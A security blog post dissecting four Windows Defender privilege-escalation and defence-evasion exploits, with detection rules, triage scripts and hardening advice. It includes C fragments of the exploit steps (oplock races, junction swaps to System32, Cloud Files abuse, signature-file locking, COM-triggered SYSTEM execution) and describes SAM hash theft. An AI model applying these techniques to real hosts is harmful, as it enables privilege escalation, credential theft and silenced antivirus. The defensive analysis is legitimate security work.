Nightmare Eclipse vs. Microsoft: Anatomy of the Defender Zero-Day Saga
Between April and June 2026, a single anonymous researcher operating under the handle Nightmare Eclipse published four distinct local privilege escalation and defense-evasion primitives — all targeting the same structural weakness in Windows Defender. Microsoft patched three of them. The fourth, RoguePlanet, dropped on GitHub hours after June Patch Tuesday, and as of this writing remains unpatched. The entire saga exposed a truth the Windows security community has danced around for years: Defender’s privileged file-operation model is architecturally broken, and the same bug class will keep surfacing until Microsoft fundamentally changes how its AV engine interacts with the filesystem.
This post dissects every primitive in the chain — the APIs, the race windows, the junction swaps, the post-exploitation paths — then maps detection surfaces and confronts the disclosure-ethics firestorm head-on.
The Structural Disease: Why Defender Keeps Producing This Bug Class
Before any individual CVE matters, you need to understand the architectural flaw that makes all four exploits possible. It is the same flaw. Every time.
Windows Defender’s core engine (MsMpEng.exe) and its update stub (MpSigStub.exe) run as NT AUTHORITY\SYSTEM. They perform file I/O — reads, writes, moves, deletes, quarantine operations — on paths that standard users can influence. That sentence is the entire vulnerability family.
The engine resolves a filesystem path at time T₀, then acts on it at time T₁. Between those two moments, a standard user can swap what that path resolves to using NTFS junction points (reparse points) and Object Manager symbolic links. The user controls the what; Defender supplies the privilege. Every primitive in the Nightmare Eclipse toolkit is a variation on this theme:
- BlueHammer exploits a SYSTEM-privileged read to steal the SAM database.
- RedSun exploits a SYSTEM-privileged write to overwrite a service binary.
- UnDefend exploits a SYSTEM-privileged file lock sequence to blind Defender’s signatures.
- RoguePlanet exploits a SYSTEM-privileged quarantine move to plant a payload that WER executes.
The timing control mechanism is also consistent: opportunistic locks (oplocks). By holding a batch oplock on the target file or directory, the attacker makes Defender’s SYSTEM-context thread block inside the kernel at the open that sits between the check and the use, and the oplock break tells the attacker that the thread is parked there. While Defender waits for the break to be acknowledged, the attacker swaps junctions, deletes files, creates placeholders, and then acknowledges the break. Defender resumes, follows the new path, and performs the privileged operation on the attacker’s chosen target.
Microsoft could eliminate the entire class by doing what James Forshaw documented years ago: validate reparse points before following them during privileged operations, use handle-based I/O instead of path-based I/O where feasible, and impersonate the caller’s token when performing remediation writes. They have not done so comprehensively. They patch individual call sites. The researcher keeps finding new ones.
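The check-then-use gap and the handle-based fix are easier to see in running code than in prose. The block below is an added example, not code from this post or from the Nightmare Eclipse toolkit, and it is a POSIX analogue: a directory symlink plays the role of the NTFS junction, lstat/open on a path string plays the role of Defender’s path-based I/O, and a directory file descriptor plus O_NOFOLLOW plays the role of handle-based I/O (on Windows, a directory handle passed as RootDirectory to NtCreateFile plus FILE_FLAG_OPEN_REPARSE_POINT and a reparse-tag check). The temp tree, the file name and the race_hook are constructed for the demo.

```python
"""POSIX analogue of the Defender bug class: a privileged service resolves a
path at T0 and acts on it at T1, and a local user swaps a parent directory in
between. Added example, not code from the page or from the toolkit; a symlink
stands in for the NTFS junction so the demo runs on any POSIX system."""
import os
import shutil
import stat
import tempfile

NAME = "TieringEngineService.exe"   # file name borrowed from the RedSun description


def write_path_based(path: str, data: bytes, race_hook=None) -> None:
    """Vulnerable pattern: check a path string, then reopen the same string.
    Windows analogue: GetFileAttributes on the path, then CreateFile on it."""
    st = os.lstat(path)                          # T0: the check
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("not a regular file")
    if race_hook:
        race_hook()                              # the attacker's oplock window
    with open(path, "wb") as f:                  # T1: the use, follows the new path
        f.write(data)


def write_handle_based(dir_fd: int, name: str, data: bytes, race_hook=None) -> None:
    """Hardened pattern: every check and the write go through handles.
    dir_fd was opened before the race (Windows: RootDirectory handle), so a
    swap of the directory name cannot redirect it; O_NOFOLLOW rejects a link
    in the leaf (Windows: FILE_FLAG_OPEN_REPARSE_POINT + reparse-tag check)."""
    if race_hook:
        race_hook()                              # swap happens, dir_fd is unaffected
    fd = os.open(name, os.O_WRONLY | os.O_NOFOLLOW, dir_fd=dir_fd)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):   # check the object we hold
            raise PermissionError("not a regular file")
        os.ftruncate(fd, 0)
        os.write(fd, data)
    finally:
        os.close(fd)


def run_demo(hardened: bool) -> dict:
    """Stage the race in a constructed temp tree and report where the payload landed."""
    root = tempfile.mkdtemp()
    try:
        work = os.path.join(root, "work")        # user-controlled staging directory
        sys32 = os.path.join(root, "System32")   # stand-in for C:\Windows\System32
        os.mkdir(work)
        os.mkdir(sys32)
        bait = os.path.join(work, NAME)
        with open(bait, "wb") as f:
            f.write(b"bait")

        def swap():                              # attacker: move the directory aside,
            os.rename(work, work + "_tmp")       # then point its name at System32
            os.symlink(sys32, work)

        payload = b"payload"
        if hardened:
            dfd = os.open(work, os.O_RDONLY | os.O_DIRECTORY)   # handle taken before the race
            try:
                write_handle_based(dfd, NAME, payload, swap)
            finally:
                os.close(dfd)
        else:
            write_path_based(bait, payload, swap)

        def has_payload(p: str) -> bool:
            if not os.path.isfile(p):
                return False
            with open(p, "rb") as f:
                return f.read() == payload

        return {"payload_in_system32": has_payload(os.path.join(sys32, NAME)),
                "payload_in_original_dir": has_payload(os.path.join(work + "_tmp", NAME))}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print("path-based:  ", run_demo(hardened=False))
    print("handle-based:", run_demo(hardened=True))
```

run_demo(False) reports the payload in the fake System32; run_demo(True) reports it in the directory the attacker moved aside, because the directory descriptor still refers to that directory no matter what the name now resolves to. Note that O_NOFOLLOW on its own would not have helped here: it only guards the leaf, and the swap is on a parent directory, which is the junction case these primitives rely on.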

Timeline and Patch Status at a Glance
| Primitive | CVE | Type | Patched? | Fixed Version | Date |
|---|---|---|---|---|---|
| BlueHammer | CVE-2026-33825 | Privileged Read → SAM → SYSTEM | Yes | Platform 4.18.26030.3011 | April 2026 Patch Tuesday |
| RedSun | CVE-2026-41091 | Privileged Write → Service Binary → SYSTEM | Yes | Engine 1.1.26040.8 | May 19–20, 2026 |
| UnDefend | CVE-2026-45498 | Signature Lock → Defender Blind | Yes | Platform 4.18.26040.7 | May 21, 2026 (out-of-band); added to CISA KEV |
| RoguePlanet | None assigned | Quarantine TOCTOU → WER Task → SYSTEM | No | — | Dropped June 10, 2026 |
Huntress reported active exploitation of BlueHammer and UnDefend chained together in the wild before the May out-of-band patches shipped. The combination is obvious: UnDefend blinds Defender, BlueHammer dumps credentials, and the attacker has SYSTEM plus a deaf endpoint. Clean and devastating.

BlueHammer — CVE-2026-33825: Privileged Read to SAM Dump to SYSTEM
MITRE ATT&CK: T1068 (Exploitation for Privilege Escalation), T1003.002 (SAM), T1562.001 (Impair Defenses).
BlueHammer targets the signature update pipeline inside MpSigStub.exe. When Defender updates its definitions, MpSigStub.exe runs as SYSTEM and reads files from a staging directory. The exploit abuses the ServerMpUpdateEngineSignature RPC endpoint to trigger this read path, then redirects it toward the SAM registry hive on a Volume Shadow Copy snapshot.
The Race
The attacker drops a file containing an EICAR test string (stored reversed in the binary to avoid premature detection) into a user-controlled temp directory, then opens it with FILE_EXECUTE access to trigger a Defender scan. A batch oplock is acquired on the parent directory via FSCTL_REQUEST_BATCH_OPLOCK:
```c
#include <windows.h>
#include <winioctl.h>

// baitDir: the user-controlled directory holding the EICAR bait file.
// FILE_FLAG_BACKUP_SEMANTICS is required to open a directory handle;
// FILE_FLAG_OVERLAPPED lets the oplock request stay pending asynchronously.
HANDLE hDir = CreateFileW(baitDir, GENERIC_READ, FILE_SHARE_READ,
                          NULL, OPEN_EXISTING,
                          FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED, NULL);
// Acquire batch oplock: it stays in force until a conflicting open arrives,
// which is what freezes Defender's SYSTEM thread on access.
OVERLAPPED ov = {0};
ov.hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
DeviceIoControl(hDir, FSCTL_REQUEST_BATCH_OPLOCK, NULL, 0, NULL, 0, NULL, &ov);
// DeviceIoControl returns FALSE with ERROR_IO_PENDING; the event is signalled
// when the oplock breaks, i.e. when Defender has entered the TOCTOU window.
WaitForSingleObject(ov.hEvent, INFINITE);
```
When MpSigStub.exe touches the directory, the oplock breaks, signaling the attacker’s thread. At this instant, the attacker:
- Deletes the original junction target via NtSetInformationFile with FileDispositionInformationEx (POSIX-semantic delete, which unlinks the name immediately even while other handles to the file remain open).
- Enumerates the current VSS snapshot path using NtQueryDirectoryObject against the Object Manager namespace.
- Creates an Object Manager symbolic link (NtCreateSymbolicLinkObject) redirecting the update path to \Device\HarddiskVolumeShadowCopyN\Windows\System32\config\SAM.
- Releases the oplock.
MpSigStub.exe resumes, follows the redirected path, and reads the SAM hive as SYSTEM. Because the read comes from the snapshot rather than the live hive, the exclusive lock the kernel holds on the running SAM never comes into play.
Post-Exploitation
The SAM hive contents are decrypted offline with the boot key (SYSKEY) derived from the SYSTEM hive: the per-account hash blob is unwrapped with RC4 on older builds or AES-128-CBC on Windows 10 1607 and later, and the inner layer is DES with two keys derived from the account RID, yielding the local NTLM hashes. The exploit then performs pass-the-hash: it temporarily resets an administrator’s password, creates a self-deleting Windows service, and injects a SYSTEM-level agent into the target user’s interactive desktop session. The service deletes itself on next boot, and the password is restored, leaving minimal forensic footprint.
The entire chain — from EICAR drop to SYSTEM shell — completes in under three seconds on tested hardware.
RedSun — CVE-2026-41091: Privileged Write to SYSTEM Shell
MITRE ATT&CK: T1068, T1562.001, T1574.010 (Services File Permissions Weakness).
RedSun is the write-side counterpart to BlueHammer’s read primitive. It abuses a missing reparse-point validation in MpSvc.dll (the antimalware service module hosted by MsMpEng.exe; the scan engine itself lives in mpengine.dll) during cloud-file rollback operations.
The Cloud Files Trick
When Defender detects a malicious file carrying Cloud Files placeholder attributes, it deviates from normal quarantine-and-delete. Instead, it writes the file back to its original location. This rollback write is performed as SYSTEM without checking whether the target path has been redirected via a junction.
The attacker registers a user-controlled directory as a Cloud Files sync root using CfRegisterSyncRoot with the provider name "SERIOUSLYMSFT" — a direct-match IOC and a fairly unsubtle editorial comment from the researcher:
```c
#include <windows.h>
#include <cfapi.h>      // Cloud Files API; link with cldapi.lib

// workDir: the user-controlled directory. "SERIOUSLYMSFT" is the provider name
// the researcher chose, so it doubles as a direct-match IOC.
CF_SYNC_REGISTRATION reg = {0};
reg.StructSize = sizeof(reg);
reg.ProviderName = L"SERIOUSLYMSFT";
reg.ProviderVersion = L"1.0";
CfRegisterSyncRoot(workDir, &reg, NULL, CF_REGISTER_FLAG_NONE);
// callbackTable: the provider's CF_CALLBACK_REGISTRATION array. REQUIRE_PROCESS_INFO
// hands the callbacks the identity of whichever process touches a placeholder.
CfConnectSyncRoot(workDir, &callbackTable, NULL,
                  CF_CONNECT_FLAG_REQUIRE_PROCESS_INFO, &connectionKey);
```
A bait file named TieringEngineService.exe is dropped into this directory with the reversed EICAR string reconstructed in memory. Opening it with FILE_EXECUTE triggers Defender’s scan.
The Double Oplock
RedSun uses two oplock stages. The first pauses Defender during initial file access. During this pause, the original bait file is deleted using FileDispositionInformationEx with POSIX semantics, and a Cloud Files placeholder is created in its place via CfCreatePlaceholders with CF_PLACEHOLDER_CREATE_FLAG_SUPERSEDE | CF_PLACEHOLDER_CREATE_FLAG_MARK_IN_SYNC. This keeps the filename alive in the directory listing while the underlying data is gone.
The second oplock pauses Defender during the rollback write. During this window, the attacker performs the directory swap:
```c
// Rename working directory aside
MoveFileExW(workDir, workDir_tmp, MOVEFILE_REPLACE_EXISTING);
// Recreate as empty directory
CreateDirectoryW(workDir, NULL);
// Convert to NTFS junction -> C:\Windows\System32. hWorkDir is a handle to the new
// directory opened with GENERIC_WRITE | FILE_FLAG_BACKUP_SEMANTICS.
// REPARSE_DATA_BUFFER is declared in ntifs.h (WDK); user-mode code usually copies
// the definition.
REPARSE_DATA_BUFFER rdb = {0};
// ... populate rdb with IO_REPARSE_TAG_MOUNT_POINT targeting \??\C:\Windows\System32
DWORD bytes = 0;
DeviceIoControl(hWorkDir, FSCTL_SET_REPARSE_POINT, &rdb, rdbSize, NULL, 0, &bytes, NULL);
```
When the second oplock releases, Defender’s write-back lands TieringEngineService.exe — now containing the attacker’s payload — inside C:\Windows\System32.
SYSTEM Execution via COM
With the service binary overwritten, the attacker invokes the Storage Tiers Management COM class:
```c
// CLSID: {50d185b9-fff3-4656-92c7-e4018da4361d} (Storage Tiers Management);
// CLSID_StorageTiersMgmt is a GUID initialised from that string by the exploit.
CoInitializeEx(NULL, COINIT_MULTITHREADED);
CoCreateInstance(&CLSID_StorageTiersMgmt, NULL, CLSCTX_LOCAL_SERVER, &IID_IUnknown, (void **)&pUnk);
```
This COM activation causes the system to launch TieringEngineService.exe as SYSTEM. The payload connects back to the orchestrator process via the named pipe \\.\pipe\REDSUN, retrieves the original user’s session ID, duplicates the SYSTEM token into that session, and spawns conhost.exe on the user’s desktop — visible proof of SYSTEM in the interactive session.
UnDefend — CVE-2026-45498: Blinding Defender While It Reports Healthy
MITRE ATT&CK: T1562.001 (Disable or Modify Tools), T1562.006 (Indicator Blocking).
UnDefend is the defense-evasion leg of the toolkit. It does not escalate privileges directly — it eliminates the detection layer so that BlueHammer or RedSun can operate unobserved.
The mechanism is deceptively simple. The attacker monitors C:\ProgramData\Microsoft\Windows Defender\Definition Updates\ using ReadDirectoryChangesW, waiting for the moment Defender’s engine begins writing a new signature package. When the VDM definition files (mpasbase.vdm, mpasdlta.vdm) appear, the exploit races to open them with an exclusive handle — GENERIC_READ with a share mode of zero:
```c
#include <windows.h>

// hDefDir: handle to the Definition Updates directory, opened with
// FILE_LIST_DIRECTORY | FILE_FLAG_BACKUP_SEMANTICS; buf must be DWORD-aligned.
// Wait (synchronously) for a definition update to begin.
ReadDirectoryChangesW(hDefDir, buf, bufSize, TRUE,
                      FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_LAST_WRITE,
                      &bytesReturned, NULL, NULL);
// Race: grab an exclusive handle before the engine can claim ownership.
// dwShareMode = 0 means any later open by the engine for read, write or
// delete fails with ERROR_SHARING_VIOLATION.
HANDLE hLock = CreateFileW(vdmPath, GENERIC_READ,
                           0,          // no sharing: exclusive lock
                           NULL, OPEN_EXISTING, 0, NULL);
// Hold hLock indefinitely; the engine cannot reload definitions while it is open.
```
With the VDM files locked, Defender’s engine cannot load updated signatures. It falls back to a stale or empty signature state. Critically, the health reporting dashboard — what the SOC sees in Microsoft Defender for Endpoint, SCCM, or Intune — continues to show green/healthy status. UnDefend degrades protection silently. No alert fires. No tamper-protection notification triggers. The endpoint appears defended while it is functionally blind.
This was added to the CISA Known Exploited Vulnerabilities catalog after Huntress confirmed in-the-wild chaining with BlueHammer.
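A practitioner’s first question after reading the timeline table and this section is whether a given host carries the three fixes and whether, per UnDefend’s failure mode, its definitions have quietly stopped updating behind a green status. The block below is an added example, not a Microsoft tool and not part of this post’s original content: it parses constructed Get-MpComputerStatus Format-List output (assumption: timestamps emitted as ISO 8601, for instance via Get-Date -Format o), compares AMProductVersion and AMEngineVersion against the fixed versions in the table, and flags definitions older than an assumed 48-hour threshold while RealTimeProtectionEnabled and AMServiceEnabled both read True. Treating any build at or above the fixed version as carrying the fix is an assumption to confirm against the MSRC advisory for your servicing branch.

```python
"""Triage helper for the patch-status table and the UnDefend symptom.
Added example, not a Microsoft tool. Assumes Get-MpComputerStatus output in
Format-List shape with ISO 8601 timestamps, and that a build at or above the
fixed version carries the fix (confirm against the MSRC advisory)."""
from datetime import datetime, timedelta

# Fixed versions as listed in the timeline table; field names are the ones
# Get-MpComputerStatus uses for the platform and the engine.
FIXES = {
    "CVE-2026-33825 (BlueHammer)": ("AMProductVersion", "4.18.26030.3011"),
    "CVE-2026-41091 (RedSun)": ("AMEngineVersion", "1.1.26040.8"),
    "CVE-2026-45498 (UnDefend)": ("AMProductVersion", "4.18.26040.7"),
}
NO_FIX_AVAILABLE = ["RoguePlanet"]           # no CVE, no patch as of this writing
STALE_AFTER = timedelta(hours=48)            # assumed threshold; Defender normally updates several times a day


def parse_version(s: str) -> tuple:
    """Dotted version string -> tuple of ints so 4.18.26040.7 sorts above 4.18.26030.3011."""
    return tuple(int(p) for p in s.strip().split("."))


def parse_status(text: str) -> dict:
    """Parse 'Key : Value' lines as printed by Format-List (first colon splits)."""
    out = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        out[key.strip()] = value.strip()
    return out


def unpatched(status: dict) -> list:
    """CVEs whose fixed platform/engine version is newer than what is installed."""
    return [cve for cve, (field, fixed) in FIXES.items()
            if parse_version(status[field]) < parse_version(fixed)]


def stale_but_healthy(status: dict, now: datetime) -> bool:
    """UnDefend symptom: protection reports enabled while definitions stopped updating."""
    last = datetime.fromisoformat(status["AntivirusSignatureLastUpdated"])
    healthy = (status.get("RealTimeProtectionEnabled") == "True"
               and status.get("AMServiceEnabled") == "True")
    return healthy and (now - last) > STALE_AFTER


def triage(text: str, now: datetime) -> dict:
    status = parse_status(text)
    return {
        "unpatched": unpatched(status),
        "no_fix_available": list(NO_FIX_AVAILABLE),
        "stale_signatures_behind_green_status": stale_but_healthy(status, now),
    }


# Constructed sample: platform carries the April fix but not the May one,
# engine predates the RedSun fix, definitions five days old, status green.
SAMPLE = """
AMEngineVersion                 : 1.1.26030.5
AMProductVersion                : 4.18.26030.3011
AMServiceEnabled                : True
AntivirusSignatureVersion       : 1.435.1200.0
AntivirusSignatureLastUpdated   : 2026-06-05T08:03:11
RealTimeProtectionEnabled       : True
"""

if __name__ == "__main__":
    print(triage(SAMPLE, datetime(2026, 6, 10, 15, 0)))
```

On the constructed sample the result is RedSun and UnDefend outstanding, RoguePlanet always outstanding, and a stale-signature flag despite both health fields reading True, which is the UnDefend picture the dashboard will not show you.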
RoguePlanet: The Post-Patch-Tuesday Provocation
MITRE ATT&CK: T1068, T1562.001, T1036.005 (Match Legitimate Name or Location).
On June 10, 2026 — hours after Microsoft shipped the June Patch Tuesday cycle — the researcher resurfaced on GitHub under the new handle MSNightmare and dropped RoguePlanet. No coordinated disclosure. No advance notice. A direct provocation released on patch day.
Because RoguePlanet has no CVE and no patch as of this writing, I am describing the mechanism conceptually to support detection engineering. I am deliberately not providing functional exploitation code.
The Primitive
RoguePlanet targets Defender’s quarantine pipeline. When Defender quarantines a flagged file, it creates a SYSTEM-owned artifact in a staging directory under C:\ProgramData\Microsoft\Windows Defender\Quarantine\. The exploit wins the TOCTOU race during this quarantine move using an oplock, overwrites the SYSTEM-owned artifact with a payload binary, then executes a three-stage NTFS junction chain that causes the payload path to resolve identically to C:\Windows\System32\wermgr.exe.
The final trigger is the WER QueueReporting scheduled task (\Microsoft\Windows\Windows Error Reporting\QueueReporting), which runs as SYSTEM and executes wermgr.exe from System32. With the junction chain in place, the task executes the attacker’s payload instead.
The binary itself is self-referential — a single IsRunningAsLocalSystem() check at entry splits execution between the unprivileged orchestrator mode and the SYSTEM payload mode. One binary, two roles, no dropper.
RoguePlanet was validated against fully patched Windows 11 (KB5094126) and Windows 10 with the June 2026 cumulative update. On Windows Server the exploit reportedly does not work reliably, though the researcher believes adaptation is possible.
Detection Engineering: ETW, Sysmon, and Sigma Across All Four Primitives
Detection surfaces exist for every primitive. The challenge is distinguishing exploit behavior from legitimate Defender operations — both involve SYSTEM-context file I/O in the same directories. The discriminators are sequence, process lineage, and anomalous API combinations.
Sysmon Coverage Matrix
| Sysmon Event ID | Primitive(s) | What to Alert On |
|---|---|---|
| 1 (ProcessCreate) | All | conhost.exe or cmd.exe spawned by MsMpEng.exe or TieringEngineService.exe; wermgr.exe spawning unexpected children |
| 7 (ImageLoad) | RedSun, RoguePlanet | cldapi.dll loaded by a process not in your cloud-sync allowlist (OneDrive, Teams, Dropbox) |
| 9 (RawAccessRead) | BlueHammer | Reads targeting \Device\HarddiskVolumeShadowCopy*\...\config\SAM. Caveat: Event 9 fires only for opens of raw volume handles (\\.\ paths), so a file-path read redirected through an Object Manager symlink may not surface here; treat it as supplementary to the ETW signals below |
| 11 (FileCreate) | RedSun | File creation in C:\Windows\System32\ where the creator process is MsMpEng.exe |
| 17/18 (PipeCreate/Connect) | RedSun | Named pipe \\.\pipe\REDSUN — a direct IOC |
| 23 (FileDelete) | BlueHammer, RedSun | POSIX-semantic deletion (FileDispositionInformationEx) of files in %TEMP% immediately before junction creation |
Key ETW Providers
| Provider | Detection Value |
|---|---|
| Microsoft-Windows-Kernel-File | Oplock request/break sequences on files under %TEMP%; watch for FSCTL_REQUEST_BATCH_OPLOCK from non-service processes |
| Microsoft-Windows-CldFlt | CfRegisterSyncRoot from processes outside your cloud-sync allowlist; RedSun’s primary trigger |
| Microsoft-Windows-Kernel-Registry | SAM hive reads (\REGISTRY\MACHINE\SAM) originating from MpSigStub.exe; should never happen in normal operation |
| Microsoft-Windows-WindowsErrorReporting | QueueReporting task execution outside the normal WER crash-reporting flow; RoguePlanet’s trigger |
| Microsoft-Antimalware-Engine | Cloud-file rollback events; correlate with CldFlt registrations from unknown providers |
Sigma Rule: Cloud Files Sync Root from Unexpected Process (RedSun/RoguePlanet)
```yaml
title: Cloud Files Sync Root Registration from Non-Cloud Process
id: 7a3f91c2-d8e4-4b1a-a930-nightmare-redsun
status: experimental
logsource:
  product: windows
  service: cldapi
detection:
  selection:
    EventID: 1   # CfRegisterSyncRoot
  filter_known:
    Image|endswith:
      - '\OneDrive.exe'
      - '\Teams.exe'
      - '\Dropbox.exe'
      - '\iCloudDrive.exe'
  condition: selection and not filter_known
level: high
tags:
  - attack.privilege_escalation
  - attack.t1068
  - attack.defense_evasion
  - attack.t1562.001
```
Sigma Rule: Defender Engine Writing to System32 (RedSun)
```yaml
title: MsMpEng Writing Executable to System32
id: 4c82a1f0-e567-4d3a-b842-nightmare-sys32write
status: experimental
logsource:
  product: windows
  category: file_event
detection:
  selection:
    Image|endswith: '\MsMpEng.exe'
    TargetFilename|startswith: 'C:\Windows\System32\'
    TargetFilename|endswith:
      - '.exe'
      - '.dll'
  condition: selection
level: critical
tags:
  - attack.privilege_escalation
  - attack.t1068
```
Sigma Rule: WER QueueReporting Spawning Unexpected Children (RoguePlanet)
```yaml
title: WER QueueReporting Task Spawning Non-Standard Child Process
id: 9f1b03d7-a4c6-42e8-9d15-nightmare-rogueplanet
status: experimental
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\wermgr.exe'
    User: 'NT AUTHORITY\SYSTEM'
  filter_legitimate:
    Image|endswith:
      - '\WerFault.exe'
      - '\WerFaultSecure.exe'
  condition: selection and not filter_legitimate
level: critical
tags:
  - attack.privilege_escalation
  - attack.t1068
  - attack.defense_evasion
  - attack.t1036.005
```
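To make the Sysmon matrix and the three Sigma rules concrete, here is the same logic as a small correlation pass in Python over constructed Sysmon-style events. This is an added example, not detection content from this post, from Huntress, or from any vendor. It evaluates the System32-write, WER-child and pipe-IOC rules per event, adds the lineage check from the Sysmon matrix, and layers on the sequence discriminator this section opens with: an Event 23 delete under a user temp directory followed within an assumed 60-second window by MsMpEng writing an executable into System32. Field names follow Sysmon’s schema (Sysmon records PipeName without the \\.\pipe\ prefix); the events, paths and window are constructed.

```python
"""Detection logic for the Sysmon matrix and Sigma rules above, run over
constructed Sysmon-style events. Added example; events, paths and the
60-second window are made up to exercise the rules."""
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)                 # assumed delete -> write correlation window
SYSTEM_USER = "nt authority\\system"
WER_CHILDREN_OK = ("\\werfault.exe", "\\werfaultsecure.exe")
SHELLS = ("\\conhost.exe", "\\cmd.exe")
SUSPECT_PARENTS = ("\\msmpeng.exe", "\\tieringengineservice.exe")


def _ts(e: dict) -> datetime:
    return datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")   # Sysmon UtcTime layout


def _low(e: dict, key: str) -> str:
    return e.get(key, "").lower()             # Windows paths compare case-insensitively


def match_event(e: dict) -> list:
    """Stateless checks: the rule names a single event trips."""
    hits = []
    eid = e["EventID"]
    target = _low(e, "TargetFilename")
    if (eid == 11 and _low(e, "Image").endswith("\\msmpeng.exe")
            and target.startswith("c:\\windows\\system32\\")
            and target.endswith((".exe", ".dll"))):
        hits.append("redsun_msmpeng_sys32_write")          # Sigma rule 2 / Sysmon 11
    if (eid == 1 and _low(e, "ParentImage").endswith("\\wermgr.exe")
            and _low(e, "User") == SYSTEM_USER
            and not _low(e, "Image").endswith(WER_CHILDREN_OK)):
        hits.append("rogueplanet_wer_unexpected_child")    # Sigma rule 3 / Sysmon 1
    if (eid == 1 and _low(e, "Image").endswith(SHELLS)
            and _low(e, "ParentImage").endswith(SUSPECT_PARENTS)):
        hits.append("defender_lineage_spawns_shell")       # Sysmon matrix, Event 1
    if eid in (17, 18) and _low(e, "PipeName") == "\\redsun":
        hits.append("redsun_named_pipe_ioc")               # Sysmon matrix, Events 17/18
    return hits


def evaluate(events: list) -> list:
    """Stateful pass over time-ordered events: single-event hits plus the RedSun
    sequence (file delete in a user temp dir, then MsMpEng writes into System32
    within WINDOW). 'event' is the index into the time-ordered list."""
    alerts = []
    temp_deletes = []
    for idx, e in enumerate(sorted(events, key=_ts)):
        t = _ts(e)
        if e["EventID"] == 23 and "\\appdata\\local\\temp\\" in _low(e, "TargetFilename"):
            temp_deletes.append(t)
        for rule in match_event(e):
            alerts.append({"rule": rule, "event": idx, "level": "critical"})
            if rule == "redsun_msmpeng_sys32_write" and any(
                    timedelta(0) <= t - d <= WINDOW for d in temp_deletes):
                alerts.append({"rule": "redsun_temp_delete_then_sys32_write",
                               "event": idx, "level": "critical"})
    return alerts


# Constructed events in time order: a RedSun-shaped burst, two benign records
# (Defender writing its own scan database, wermgr launching WerFault), and a
# RoguePlanet-shaped WER child.
MSMPENG = r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26030.3011\MsMpEng.exe"
ORCH = r"C:\Users\alice\AppData\Local\Temp\rs.exe"
EVENTS = [
    {"EventID": 23, "UtcTime": "2026-06-10 14:02:01.100", "Image": ORCH,
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\work\TieringEngineService.exe"},
    {"EventID": 11, "UtcTime": "2026-06-10 14:02:01.400", "Image": MSMPENG,
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db-wal"},
    {"EventID": 11, "UtcTime": "2026-06-10 14:02:02.300", "Image": MSMPENG,
     "TargetFilename": r"C:\Windows\System32\TieringEngineService.exe"},
    {"EventID": 17, "UtcTime": "2026-06-10 14:02:02.500", "Image": ORCH, "PipeName": r"\REDSUN"},
    {"EventID": 1, "UtcTime": "2026-06-10 14:02:03.000", "Image": r"C:\Windows\System32\conhost.exe",
     "ParentImage": r"C:\Windows\System32\TieringEngineService.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "UtcTime": "2026-06-10 14:05:00.000", "Image": r"C:\Windows\System32\WerFault.exe",
     "ParentImage": r"C:\Windows\System32\wermgr.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "UtcTime": "2026-06-10 14:05:01.000", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wermgr.exe", "User": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for a in evaluate(EVENTS):
        print(a)
```

The two benign records produce nothing, which is the point of the filters: MsMpEng writing under its own ProgramData tree and wermgr launching WerFault are the everyday SYSTEM-context activity the section warns you have to discriminate from. The sequence alert is the higher-confidence one; a lone Event 11 hit is worth investigating, a temp delete followed by that write within seconds is the race itself.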
Immediate Hardening
For RoguePlanet specifically, until a patch ships: disable the QueueReporting scheduled task if your environment can tolerate reduced WER telemetry (schtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable). Monitor for re-enablement. This is a stopgap, not a fix.
For all four: deploy application control (WDAC/AppLocker) rules that prevent unsigned or unexpected binaries from executing out of C:\Windows\System32. Restricting link creation is harder than it sounds: NTFS symbolic links already require SeCreateSymbolicLinkPrivilege, but NTFS junctions and Object Manager symbolic links need no privilege at all, which is why these primitives use them. The practical lever is ACLs on the temp and staging directories Defender acts on, rather than a privilege, and it still needs per-environment evaluation.

The Disclosure War: Ethics, Legal Threats, and the Chilling Effect
The technical exploits are only half the story. The disclosure timeline is the other half, and it is ugly on all sides.
Nightmare Eclipse claims they initially attempted coordinated disclosure through MSRC for BlueHammer. According to posts that survived the repository takedowns, the researcher reported the bug in early February 2026, received an automated acknowledgment, and then heard nothing for six weeks. When they followed up, they were told the issue was “under review” with no timeline. The April Patch Tuesday fix shipped without credit to the researcher — MSRC’s advisory attributed the discovery internally.
Whether that account is fully accurate is unknowable from outside. What is documented is what happened next: the researcher published BlueHammer’s full PoC on GitHub the same week, followed by RedSun and UnDefend in rapid succession. Microsoft’s legal team issued DMCA takedown notices against both the GitHub and GitLab mirrors, arguing the exploits constituted circumvention of a technological protection measure under 17 U.S.C. § 1201. Both platforms complied. The repositories disappeared.
The researcher moved to self-hosted infrastructure and continued publishing. RoguePlanet, the most aggressive drop — timed to land hours after Patch Tuesday, targeting a still-unpatched primitive — was posted on a new GitHub account (MSNightmare) and survived long enough to be widely mirrored before being taken down again.
Where the Controversy Actually Lives
The security research community is not of one mind here. The lines I see being drawn:
In the researcher’s defense: MSRC’s coordinated vulnerability disclosure process has a documented pattern of slow response, non-communication, and inadequate credit for external researchers. When the system designed to handle responsible disclosure fails, researchers lose both the incentive and the mechanism for cooperation. The DMCA takedown of security research — not malware, not exploit kits, but documented vulnerability research with PoC code — sets a precedent that threatens the entire Windows internals research community. ZDI, Project Zero, and multiple independent researchers have publicly criticized this use of copyright law against security tooling.
